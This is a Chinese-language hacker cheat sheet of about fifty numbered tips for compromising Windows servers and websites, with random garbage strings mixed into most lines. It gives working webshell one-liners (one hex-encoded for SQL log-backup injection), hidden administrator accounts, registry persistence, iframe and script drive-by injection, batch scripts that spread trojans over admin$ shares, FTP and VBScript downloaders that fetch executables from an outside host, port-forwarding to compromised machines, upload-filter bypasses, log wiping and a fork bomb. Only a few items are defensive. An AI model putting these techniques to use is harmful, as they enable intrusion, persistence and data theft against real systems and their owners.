1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
/ Z2 V9 Z$ h- Q& B. A# y; wcacls C:\windows\system32 /G hqw20:R
& e3 |1 I6 F5 L+ h$ P& _& S思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
5 J* K0 y& c) v恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F4 j0 d+ g' z2 Q+ ^& E# }/ m8 V
/ a- b; g: d( I9 I) s- r) z2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
9 c. m; ]" M! W; ^( B7 O7 z0 Q H" B8 E* Y' B9 `9 x6 E0 {
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。$ l( W: U7 E( g7 ]3 J
) B" F' _4 Z& o5 I$ ?% c3 k. R4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
. U" c/ m) \4 v c2 C3 S( d, f
" ]' m; I; _+ |+ `0 r& j0 G5、利用INF文件来修改注册表
_$ Q3 ?7 Y: n) {; `[Version]
7 R7 B1 L7 s/ Y9 P, GSignature="$CHICAGO$"
6 f/ f7 Q, J5 C m, Z, _[Defaultinstall]7 h# x/ c; x3 H2 t/ h4 l
addREG=Ating3 p3 t9 T3 v" \6 d
[Ating]2 y6 Q+ W9 K! t) ]
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
7 r- _# l1 L& [/ }6 I2 U% {以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:6 s+ X ^- J0 O5 Z" I
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
: O3 l a% l( o- `9 R其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
9 y1 X9 c7 {& e6 r+ `HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
9 e: ?7 T" h! J0 E1 i+ S# n$ a. bHKEY_CURRENT_CONFIG 简写为 HKCC
4 B' B5 q3 [/ u! O! [/ Y0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值' l' K: }2 g6 O _
"1"这里代表是写入或删除注册表键值中的具体数据
% \$ M0 R% j- g8 V9 t6 y
3 f& B# v0 C8 i0 K; a6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
/ r7 H$ c- P. c0 S* y多了一步就是在防火墙里添加个端口,然后导出其键值
2 B8 r* E6 |1 @3 L! c3 [0 j' ~[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]9 @% z1 S2 Y/ @, t
3 m- _ V: z& s+ k
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽. C1 \6 w2 W* ~/ o5 H6 Z! M
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。7 ]% c# k! C; G
% h7 C# z; \/ f9 f2 A: v, [
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
9 f8 V8 z+ z) f0 w- L: ]1 X4 j; ^! u9 Q; k1 @. J [9 C
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
; T9 C' D0 v R& k可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
, v; w) r# {) O6 B
+ U s- s7 S% `% Y( d: s10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
; ~6 V. |7 {* x" Q; b0 k, F9 m- r" j. {
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
! L5 ]# e% b2 j- T9 S+ ?用法:xsniff –pass –hide –log pass.txt
8 K ^# h! g* Q1 a* n" D; y. P6 u1 c3 |# ?: n
12、google搜索的艺术
$ D! @4 b! D7 R: k! }4 h$ L搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”) I0 x/ Y& y! T: y- T
或“字符串的语法错误”可以找到很多sql注入漏洞。
4 J8 C* r- \6 f6 U2 L3 _9 g- v% X8 @2 s, i
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。4 S1 I' P) o0 h2 K* @
& Z$ i& p2 E3 f" m- u9 `' p14、cmd中输入 nc –vv –l –p 1987/ Q8 b; ~- |* ~3 j
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃$ x6 L1 B- ?7 ^# G( _; v2 o6 o
: V$ \1 c3 g; b$ f, z* j
15、制作T++木马,先写个ating.hta文件,内容为
; r( c) k8 Y" Y0 m. N' N' t% m& |<script language="VBScript">+ U4 P! t) n2 h
set wshshell=createobject ("wscript.shell" )
( A& F: _6 t# Q7 P$ s/ ba=wshshell.run("你马的名称",1); Q9 f2 b) f( \$ e% z+ S3 }( a
window.close. j: D) V/ f9 h2 U7 u1 L5 p1 J
</script>" r4 }5 J0 V. p' w! t/ q3 f1 K7 n0 e
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。$ V* P, K8 B1 \9 ]2 E: @3 _
6 x! o( E* | a. {3 w7 ~
16、搜索栏里输入
6 H" ?3 d% D! Q/ O! @" f; {( x关键字%'and 1=1 and '%'='( v0 h- t; O( m' |# f
关键字%'and 1=2 and '%'='
! a/ q$ I; x T8 S+ M8 m比较不同处 可以作为注入的特征字符# z ~6 ^; D8 y* `7 c C
, u2 j- B) Q! w2 ?
17、挂马代码<html>
1 A' }/ _6 M+ Y7 t& L<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
9 i# o( p1 }+ i: m</html>& ^4 l! |3 W+ A/ ]$ V" |1 ?
: s4 p. E$ |! K- Z18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,1 L3 ~4 a* g/ d/ s* _3 T$ D/ h
net localgroup administrators还是可以看出Guest是管理员来。
/ I# Y) S# n; H, [ i/ x1 |* ]) u6 v
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
: v u4 x9 P1 a8 Z: J# ~% H用法: 安装: instsrv.exe 服务名称 路径8 j/ Z4 T1 g: T% o& J5 h# l: ^
卸载: instsrv.exe 服务名称 REMOVE
0 E3 x4 W3 i3 `
, s; U8 z/ v) t& q: l% K
[. [& {. _ W21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉8 b% i+ `& ~4 |! U7 E
不能注入时要第一时间想到%5c暴库。7 p3 K% l) `8 w& r
# B0 y" P& \: g M$ ^; w
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~/ U6 k3 l( K; R- o% U
# L6 Q0 {9 u" e23、缺少xp_cmdshell时
+ i: N# ~$ ~$ \( d! _- {6 f尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
+ ~% K& A a9 s9 z假如恢复不成功,可以尝试直接加用户(针对开3389的)
! C+ ]3 B, N. M# hdeclare @o int! F- m7 X/ u! ] ~. o7 W: ?
exec sp_oacreate 'wscript.shell',@o out
5 R. |6 Z2 n4 T Xexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员" B/ ^% {& C; E
+ A+ R) }' C/ w7 F; ]; f
24.批量种植木马.bat
q* l' ~1 B/ r0 a& ?( L8 o/ o; Ifor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
- E" m+ q5 y% m: w, L1 i' Y0 Vfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
4 e4 M: o( j# \- {$ c* R# z扫描地址.txt里每个主机名一行 用\\开头
% ?% c$ Z, P& i; k2 z2 ^' n% _2 k, ?2 v/ ^. Q) q5 H9 A3 Q2 B
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
9 n% {1 [5 H; P; p, W' A7 K! d0 v4 b+ F$ o! q1 R7 d
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.5 [9 x* J0 p% j* k+ N
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.% @+ ] r2 `- G4 a$ B
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马2 a: j( X* G% L B( e# E
2 C, J5 k+ r3 M4 D0 @+ q6 ^4 k
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
6 q) {* W. z# }+ m" h然后用#clear logg和#clear line vty *删除日志* e/ F' A) p, _' k; x, f3 p# b
7 h: T! ]$ ?6 \0 R1 q6 n% |28、电脑坏了省去重新安装系统的方法; s \! a3 C! C3 i- `3 y
纯dos下执行,1 i7 b) F) F) f8 x) {
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config' X/ y4 o" T% k0 W
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config4 _% @* C% g3 l6 _3 y1 r
- v( p0 c) u3 ^9 g6 l29、解决TCP/IP筛选 在注册表里有三处,分别是:. ]2 v) [) }/ }5 E0 f- r+ j
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
) f) m. N2 O& Z, ?3 ~1 @HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
- n w$ U9 a9 F4 H6 f# `- lHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip+ ]% B3 ?, O! b7 ?. F- h2 q
分别用0 q: N# L7 }8 _- E6 ]- y
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip& T" a) ?6 M% K% S! V
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
! @' r$ G) h) C; ]regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip, b0 `. u0 t, _5 c) E0 Z4 ]
命令来导出注册表项
G# _8 k6 L! t( T# a然后把三个文件里的EnableSecurityFilters"=dword:00000001,
; c$ ~9 a! _0 S0 ~9 R$ g# q+ O, X: I改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用' M; w4 i$ `1 k
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
% Y$ r% Q% k8 k' Z! P( Z' g, h
, w: T u3 I3 r30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U9 d* S" G+ O. k1 {! h% m
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的35 U2 X8 j2 I" w3 o: \% S- g# P) X
. E2 f3 f3 P+ P2 F z
31、全手工打造开3389工具
2 S" Q4 y0 `4 b8 R4 L. Q" M打开记事本,编辑内容如下:
& y' q$ x' n, z% y+ z& gecho [Components] > c:\sql4 I3 _% K, @" @; w% Y' D; `7 X; L
echo TSEnable = on >> c:\sql/ M" V8 Y6 ~. B4 ^
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
9 D/ a5 F- m! r1 n4 X编辑好后存为BAT文件,上传至肉鸡,执行
: P9 [( W8 ^" N# k7 k6 J/ f- h- |/ I
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马* ^& d6 @3 M0 e3 }8 g/ |, M* ?
+ G& G5 n8 G" ^4 T E, |33、让服务器重启
/ X, Q- X, N! t f/ C7 o* l6 a写个bat死循环:, B" y" ?: D$ S
@echo off) i& k' l' }1 S- n
:loop10 T- p) I& M* h& N$ k$ C
cls; ?# X, s) I* A& R+ l4 V$ ]
start cmd.exe* ]. F% V% x& v* P6 F0 T' i; S
goto loop1
" J4 d1 ^5 D f H- L9 \/ \保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
5 d D1 H1 i8 ~& }% b) Q& |0 z0 T0 d/ u* K9 Z9 I
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,6 y: w* ?- e7 i
@echo off1 D: }8 ^' I' ^: S
date /t >c:/3389.txt7 k. ]6 h* F+ z1 Y9 M% s: A& V) h
time /t >>c:/3389.txt7 z2 Z' J5 n) \4 k+ a- F
attrib +s +h c:/3389.bat
+ M z" j r# N8 j; Battrib +s +h c:/3389.txt C" r2 L: P ~4 s U
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
: g0 j5 k5 G0 }' z. b+ N9 M) m并保存为3389.bat# x# A, O( ~: t6 H; G
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
- b* D* |5 U* J1 U7 P0 D
- O, U6 m+ S n; [: X5 e4 Y2 p0 X35、有时候提不了权限的话,试试这个命令,在命令行里输入:
6 a) x/ W( b) _8 `8 Zstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
e7 x8 ?. t. x: K( Y+ u# O2 L输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。5 d2 b; ?' F* A" f
: K8 K& k+ t! H/ `9 I' q {36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件& `/ s3 r" R. r. C7 m; l
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
1 D# h. K0 \# secho 你的FTP账号 >>c:\1.bat //输入账号" Z3 ^9 g( |, a7 g$ `
echo 你的FTP密码 >>c:\1.bat //输入密码# O" t! Z- g& n
echo bin >>c:\1.bat //登入8 W) [$ n: E5 E2 V
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么6 T! e. }0 |( n5 h
echo bye >>c:\1.bat //退出
6 j4 P O2 V: m* r9 C) N然后执行ftp -s:c:\1.bat即可
6 j- O+ _, G3 p" K. i, o! e+ g5 O* a
37、修改注册表开3389两法
% C+ f7 G/ k C" Z( \(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表1 D8 l4 R/ j4 z( P& ~& O
echo Windows Registry Editor Version 5.00 >>3389.reg
; r$ s% F! O! becho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg1 n& ^+ `- ~8 v
echo "Enabled"="0" >>3389.reg
3 g( t- l7 r; F% Kecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows* u2 M: B. J: ?7 X4 I, c
NT\CurrentVersion\Winlogon] >>3389.reg
8 Q0 Z4 c1 e$ _( cecho "ShutdownWithoutLogon"="0" >>3389.reg
/ v' p4 ~" r! _, x% Necho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]6 g" Y9 \* |4 @7 X. E Q& }. `2 `
>>3389.reg
. G& ~- a0 ^! b1 M4 N2 eecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
1 T- F( @6 |1 E" I- E8 {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]; ^' C! \7 ^: {* n" m. ^2 K
>>3389.reg7 k5 r V! k. D0 p( C
echo "TSEnabled"=dword:00000001 >>3389.reg
4 Z8 P* h. K8 W: \6 Secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg, S) W, K1 i2 \7 n! s9 t' f2 {
echo "Start"=dword:00000002 >>3389.reg
$ a; Y& s6 ~- becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]+ e! I9 {+ c8 d% k4 Y2 C
>>3389.reg& t% S c% O; w/ a) k {
echo "Start"=dword:00000002 >>3389.reg0 H7 `( y0 y& t# ^! {( M) w0 o
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg. D! H/ c; c/ C5 h0 }0 `
echo "Hotkey"="1" >>3389.reg6 {* A7 Q. M7 D6 X j. `; J: H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* p( R2 R1 [' w# Y7 ? z! q
Server\Wds\rdpwd\Tds\tcp] >>3389.reg6 K" v6 T" o$ [' F$ B& j) I
echo "PortNumber"=dword:00000D3D >>3389.reg
& ^ d" o9 W9 J6 Q- s( t0 oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
/ |- `. W6 b/ J$ RServer\WinStations\RDP-Tcp] >>3389.reg( q7 @( u9 J- w" c# n% M
echo "PortNumber"=dword:00000D3D >>3389.reg
. I. [. s, j% ~8 h8 c- C& N把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。7 ~# N8 L6 W3 T0 n
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)9 G( q: {- l/ Y0 R/ Y3 G) z
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效2 ~. G4 [' X+ @# h( n4 Q. v+ [- X
(2)winxp和win2003终端开启
# g% _- f( c! q8 d' w用以下ECHO代码写一个REG文件:9 }5 e: A* d+ n2 u7 i9 e) R
echo Windows Registry Editor Version 5.00>>3389.reg: p z4 I/ y3 a+ u7 ]8 A, \* a
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal4 O& t8 V* I+ N( v
Server]>>3389.reg% P6 A' R7 e7 ^ F0 g
echo "fDenyTSConnections"=dword:00000000>>3389.reg6 @, I; I; u' k2 J1 k0 z6 X
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, ^6 Z# h9 x2 r( SServer\Wds\rdpwd\Tds\tcp]>>3389.reg5 C: h' W# R. ^+ L
echo "PortNumber"=dword:00000d3d>>3389.reg
- [' E& m- ^8 I' F, Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal5 l! a1 R- X$ y9 s+ M
Server\WinStations\RDP-Tcp]>>3389.reg
, k. U3 O ?+ A9 O7 u$ |echo "PortNumber"=dword:00000d3d>>3389.reg
9 V- n& s) V" }( N然后regedit /s 3389.reg del 3389.reg
. P0 O+ S$ u" }& H" lXP下不论开终端还是改终端端口都不需重启& ?9 t7 v6 a1 T; w' y. L% r6 Z" `
, N9 X' a5 K: r! _3 v, s) h
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃' s$ r# s; A# g/ n2 k! g
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'; D I& l0 o9 Z
) Z5 v# C: S( {: p% X- q$ }3 K
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
5 H" R8 q) X0 y3 j) R6 q6 f(1)数据库文件名应复杂并要有特殊字符
, B1 X8 Y% N' y1 n; `(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
+ W% u! ^- p- M" ?4 f: A. |: m将conn.asp文档中的- Z% I' K* v; J$ ^6 H v9 R
DBPath = Server.MapPath("数据库.mdb")- L5 q. T, p `! m5 q G
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath+ a( [" e5 [6 v
, H0 R# ^/ I# g; f+ S修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置) I/ @& c0 O( \9 r- p5 P
(3)不放在WEB目录里. R1 u% o* h1 l
7 y+ f: V ~) j* ~5 k! h% F
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉; \# t7 h5 `0 M+ I% M
可以写两个bat文件6 c& `, _: }* I
@echo off
5 I/ z% F! I. t& M, q! g@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
( h R0 r4 x! F+ d@del c:\winnt\system32\query.exe
7 p6 K. r- U. z, R V& F3 E@del %SYSTEMROOT%\system32\dllcache\query.exe' j2 Q: e+ x2 P0 Y, ?
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
9 F/ r" V! t0 M8 Q
/ u Z, n, T2 A7 M9 J@echo off
* |: W; s% d. |# I- I- V@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe5 s& C5 q+ G& K0 i/ f7 H" i
@del c:\winnt\system32\tsadmin.exe3 M `6 O; L& Z3 _) M
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex% a6 q5 p" ]4 _4 f. ]
" V- c& C2 e' q, i( P41、映射对方盘符" A1 O2 ?* N3 r/ l
telnet到他的机器上,3 r& @+ m7 v! x0 G% a4 k! ~- ]; p
net share 查看有没有默认共享 如果没有,那么就接着运行" o- F; Y* x& n ^6 O7 i
net share c$=c:
) h7 N) V3 Q) o; n5 M9 ]1 [# Nnet share现在有c$
5 o. h2 ~' `& `: h' \9 X在自己的机器上运行
1 ^* `- j$ c$ V/ k0 i7 b# Xnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K/ t( E2 d, A' f' z" R4 O P
1 _- @5 }+ q: k% V" d5 e42、一些很有用的老知识; G8 z% j* u E* a+ k
type c:\boot.ini ( 查看系统版本 )
3 ]5 }, c) P9 m0 ?net start (查看已经启动的服务)8 N3 v+ }0 L% }& {$ T/ \7 l
query user ( 查看当前终端连接 ). Y3 h/ y& V \$ e# o
net user ( 查看当前用户 )
' l* v! g( u% ?; m5 b6 E4 [net user 用户 密码/add ( 建立账号 )1 J P' q2 i3 j: ?& y- ^
net localgroup administrators 用户 /add (提升某用户为管理员)
, v' ?" d9 J. d9 ?6 k: B6 jipconfig -all ( 查看IP什么的 )
1 f% V' H6 s4 S+ `' |+ s& U/ [& Vnetstat -an ( 查看当前网络状态 )& p6 }$ F5 F7 z f( v
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
) n7 k* x6 U8 q克隆时Administrator对应1F4" W$ `. m h* a# Z* x' @
guest对应1F5! I- E3 E# K1 }) R
tsinternetuser对应3E8
' H, \7 T6 s" J& E7 z; G; r8 L: R8 q. Z! f8 ~: E ~
43、如果对方没开3389,但是装了Remote Administrator Service* @# P6 c0 K% B- f! u0 Q
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接/ @! Y" I! _9 @) G! X. M( C& ~
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
W+ a+ n' m z2 W先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
2 v: S4 F( ]* Y2 p1 }3 u+ R D0 G" o; A# `
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)4 ~! ?6 z8 n2 o$ S: i" `
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)& I" f4 H% l/ T) M3 J2 P; U
6 B, w( n1 q1 I( G/ _45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
7 p# i' o' J' z2 o8 }echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
7 R1 f" k4 J9 A1 s; F, i^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
$ E- l% `5 b$ F) p4 x6 G0 [/ @8 ZCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =+ j# W% t4 b5 t3 ~8 U! ^% C: d$ D( l
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs4 k; o( n3 \' w
(这是完整的一句话,其中没有换行符). p. y+ v# o" _- y
然后下载:( u- }( p8 B- `1 b. z8 G
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
% k2 s' O5 k: b: O5 e7 l& z) g$ j2 _# }; [' `
46、一句话木马成功依赖于两个条件:2 j _( I1 v7 L% h
1、服务端没有禁止adodb.Stream或FSO组件
# B8 s: Y, K; e+ n. S" a2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
8 n8 S- e. f( A) N! t
8 M* X" k+ W" y4 Q! L& @47、利用DB_OWNER权限进行手工备份一句话木马的代码:/ C; B; n0 W1 P
;alter database utsz set RECOVERY FULL--: P( G4 `6 |4 @
;create table cmd (a image)--2 x! e7 [+ L0 n6 i
;backup log utsz to disk = 'D:\cmd' with init--5 |. t; k' y# `; N6 d. c/ [# M9 K9 L
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
+ h2 m+ h/ \+ ]; i/ K( u5 `9 A;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--& O! G5 k) O4 K; j$ v" ^
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
, _( t1 q. t& B# \5 u
1 {7 |$ V3 n) N( y9 a7 o( p48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
( h) ]2 r0 T" W( K/ {% O
- @( f. x/ B. `$ w5 o5 C用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options( a& F/ \& V* l% q1 x
所有会话用 'all'。% r f2 g0 P' A, F
-s sessionid 列出会话的信息。
# o$ e; c# ^4 t) Y. F0 Z-k sessionid 终止会话。
4 u9 h1 f+ C/ o+ \# h2 }# m-m sessionid 发送消息到会话。
/ B& G' ^8 W. L2 n" }1 l
$ g* J* ]$ A! o) K( {# Hconfig 配置 telnet 服务器参数。/ ]$ e9 R9 o" R6 o) G% P3 j
' a' J9 `( y5 |9 \: L) jcommon_options 为:6 v- H# E1 E4 j# f; Y: R! z* x5 e
-u user 指定要使用其凭据的用户
; b; ]9 V# T9 B% K- B-p password 用户密码& V0 M) b3 p' G% v' s3 F
( t' F4 h8 O0 |9 k3 H3 x
config_options 为:/ }: Y( z* _6 U+ l
dom = domain 设定用户的默认域
( M" ^' ?2 U- _ qctrlakeymap = yes|no 设定 ALT 键的映射
Z( [0 Y# I- O5 W3 I) y" k- v otimeout = hh:mm:ss 设定空闲会话超时值
2 N, B n2 t8 M$ c. W. G& Xtimeoutactive = yes|no 启用空闲会话。% _9 n: q( @* x, {& i% \, Z
maxfail = attempts 设定断开前失败的登录企图数。
6 f3 s8 w5 ]) W/ s- l* g$ ?maxconn = connections 设定最大连接数。
7 t+ B4 H+ w6 T) R7 gport = number 设定 telnet 端口。& F) w: P( w( q) ?" I6 R d+ o
sec = [+/-]NTLM [+/-]passwd
j" P2 m- P' `8 w设定身份验证机构
2 S1 v1 S7 d" f( H! {, P8 U3 i8 Wfname = file 指定审计文件名。
p8 @" p: X$ W: E# Q+ u( O8 |fsize = size 指定审计文件的最大尺寸(MB)。$ e3 @. Q8 b% S6 U# E
mode = console|stream 指定操作模式。 \( V! [% V$ V/ k) k
auditlocation = eventlog|file|both
* S% X' i( |; H) |* A" o; b0 {指定记录地点
7 U0 H, \0 K& }6 Maudit = [+/-]user [+/-]fail [+/-]admin" G3 H5 Y) m9 T' ^# c0 D: l* A
6 Q' \0 h- B$ K+ Z7 w, g
49、例如:在IE上访问:
+ B6 }, W$ Q/ x! v% b# o4 \- W3 Qwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/, u* ^+ k( K5 `# @5 \2 D& b! Z
hack.txt里面的代码是:. G' {& f5 W# _5 B: [3 a1 h/ C
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
; q2 k& r3 m# k4 m& }把这个hack.txt发到你空间就可以了!* N. f3 X( k6 x- O8 u
这个可以利用来做网马哦!
: Q' V, F* z2 }6 o# F: A, s+ o6 k
% K6 A6 z E/ d$ d; i: `8 l50、autorun的病毒可以通过手动限制!2 O1 N5 @: n4 ^/ o) u' ~
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
. z1 r) b/ S' e8 r2,打开盘符用右键打开!切忌双击盘符~
+ k- J u( U8 l0 W; {$ r3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
- x* j: @4 Z% n- p4 v: a5 T" [( B& T! n" b& o" N
51、log备份时的一句话木马:) V: C# s4 m& [- D9 n W1 P. Y
a).<%%25Execute(request("go"))%%25>
6 }" i4 R9 q! F( {) O% ~% |b).<%Execute(request("go"))%>
" c0 J |* @4 r1 H# cc).%><%execute request("go")%><%8 J8 O3 ~* N* B
d).<script language=VBScript runat=server>execute request("sb")</Script>
& D2 N7 b6 G. o3 C' B( p* }0 Fe).<%25Execute(request("l"))%25>
# Y6 @7 z& }4 E' h' |% s/ X. Sf).<%if request("cmd")<>"" then execute request("pass")%>, F2 g: h+ Q: r# q* S" u
) }: p3 U+ N, e1 y: }% s" u
52、at "12:17" /interactive cmd% G' a8 a5 b0 i- Y& ~- O
执行后可以用AT命令查看新加的任务
